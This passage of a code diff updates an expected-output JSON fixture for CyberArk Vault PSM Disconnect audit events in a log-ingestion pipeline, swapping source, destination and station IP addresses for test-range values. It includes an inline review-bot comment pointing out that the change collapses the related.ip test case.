06:18:36\",\"IsoTimestamp\":\"2021-03-15T13:18:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -1644,39 +1458,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" 
@@ -1693,7 +1486,7 @@
 },
 "@timestamp": "2021-03-15T14:08:11.000Z",
 "file": {
- "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian"
+ "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian"
 },
 "ecs": {
 "version": "1.12.0"
@@ -1704,16 +1497,15 @@ "adrian" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T14:08:11Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:11\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:11Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" 
Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:11\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:11Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" 
Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -1725,22 +1517,22 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "f5725611-ca57-4a2a-a089-f45b3174a358", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "session_duration": "00:00:06" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Disconnect", "timestamp": "Mar 15 07:08:11", "desc": "PSM Disconnect" 
@@ -1752,8 +1544,8 @@ "event": { "severity": 2, "duration": 6000000000, - "ingested": "2021-06-09T10:24:31.624827200Z", - "original": "\u003c5\u003e1 2021-03-15T14:08:11Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:11\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:11Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:11\",\"IsoTimestamp\":\"2021-03-15T14:08:11Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813838800Z", + "original": "\u003c5\u003e1 2021-03-15T14:08:11Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:11\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:11Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n 
\u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 
07:08:11\",\"IsoTimestamp\":\"2021-03-15T14:08:11Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -1776,39 +1568,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" 
@@ -1825,7 +1596,7 @@ }, "@timestamp": "2021-03-15T14:08:36.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -1836,16 +1607,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T14:08:36Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" 
Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n 
\u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -1857,8 +1627,8 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "7db90436-8a1a-4203-9a96-65137625ab2d", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "session_duration": "00:00:09" }, "rfc5424": true, @@ -1866,7 +1636,7 @@ "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -1879,9 +1649,9 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615814025" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Disconnect", "timestamp": "Mar 15 07:08:36", "desc": "PSM Disconnect" 
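Review bot: Station and DstHost now both resolve to 67.43.156.15 (the `"station"` change at the end of this line and the `"dst_host"` change just before it), so `related.ip` drops from three entries to two and this fixture no longer verifies that `cyberarkpas.audit.station` is added to `related.ip` independently of `destination.ip`. The previous data kept the station address distinct from the destination, so that path was exercised before; the same collapse repeats in the next record (the `@@ -1977` and `@@ -2020` hunks). Using a third address from the supported subset for Station, e.g. `"station": "<third supported test IP>"`, would preserve the three-entry `related.ip` case. The input log that produces this expected file is outside the hunk, so the change belongs there with the expected output regenerated afterwards.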
@@ -1893,8 +1663,8 @@ "event": { "severity": 2, "duration": 9000000000, - "ingested": "2021-06-09T10:24:31.624829700Z", - "original": "\u003c5\u003e1 2021-03-15T14:08:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
